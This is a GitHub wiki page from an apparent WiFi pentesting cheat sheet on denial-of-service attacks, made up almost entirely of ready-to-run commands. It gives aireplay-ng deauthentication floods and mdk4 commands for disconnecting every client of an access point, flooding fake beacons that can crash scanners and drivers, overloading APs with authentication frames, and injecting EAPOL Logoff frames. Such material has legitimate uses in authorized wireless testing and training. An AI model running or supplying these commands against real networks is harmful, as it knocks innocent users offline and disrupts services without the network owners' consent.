-
Notifications
You must be signed in to change notification settings - Fork 183
05. WiFi Denial of Service
Koutto edited this page Nov 1, 2020
·
1 revision
- Deauthentication Attack:
aireplay-ng --deauth 0 -c <MAC_target> -a <MAC_AP> mon0 # Infinite amount of deauth attacks
aireplay-ng --deauth 5 -c <MAC_target> -a <MAC_AP> mon0 # 5 deauth attacks
- Deauthentication + Disassociation Attack:
mdk4 mon0 d -b <MAC_AP_file> -c <channel> # MAC_AP_file stores MAC address of AP. All clients connected to the AP will be targeted
mdk4 mon0 d -c <channel> -b <victim_client_mac.txt> -E <SSID> -B <MAC_AP> # victim_client_mac.txt contains MAC of device to disconnect
mdk4 mon0 d -c <channel> -E <SSID> # Simple. Disconnect all clients connected on AP with SSID
Generate many fake APs by sending lots of beacon frames -> Confuse clients, can crash network scanners & drivers
mdk4 mon0 b
mdk4 mon0 b -s 1000 # Increased speed
mdk4 mon0 b -m -w ta # Use valid AP MAC & only create WPA/WPA2 networks
mdk4 mon0 b -a -w nta -m
-
-a
: Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit -
-w
:n
(create Open)t
(Create WPA/TKIP)a
(Create WPA2/AES) -
-m
: Use real BSSIDS
Send authentication frames to all APs found in range -> Too many clients can freeze or reset several APs
mdk4 mon0 a -m
mdk4 mon0 a -m -a <MAC_AP> # Only target specified AP (random data from random clients)
mdk4 mon0 a -m -i <MAC_AP> # Only target specified AP + Intelligent test (capture & repeat data packet from connected clients)
- Flood AP with EAPOL Start frames to keep it busy with fake sessions -> disable handling of any legitimate clients:
mdk4 mon0 e -t <MAC_AP>
- Inject fake EAPOL Logoff messages -> Kick clients from AP:
mdk4 mon0 e -t <MAC_AP> -l
- 01. WiFi Basics
- 02. 802.11 Specifications
- 03. WPS (WiFi Protected Setup)
- 04. WPA Protocol Overview
- 05. WPA/WPA2 Personal (PSK) Authentication
- 06. WPA/WPA2 PSK Traffic Decryption
- 07. WPA/WPA2 Enterprise (MGT)
- 08. Evil Twin Attacks
- 09. 802.11 Network Selection Algorithms
- 01. WiFi Interfaces Management
- 02. WiFi Connection
- 03. WiFi Monitoring (Passive Scanning)
- 04. Hotspot Captive Portal Bypass
- 05. WiFi Denial of Service
- 06. WEP Authentication Cracking
- 07. WPA/WPA2 Personal (PSK) Authentication Cracking
- 08. WPA/WPA2 Enterprise (MGT) Authentication Cracking
- 09. WPA/WPA2 Personal (PSK) Traffic Decryption
- 10. Basic AP (Manual Configuration)
- 11. Open Network (no passphrase) Rogue AP / Evil Twin
- 12. WPA/WPA2 Personal (PSK) Rogue AP / Evil Twin
- 13. WPA/WPA2 Enterprise (MGT) Rogue AP / Evil Twin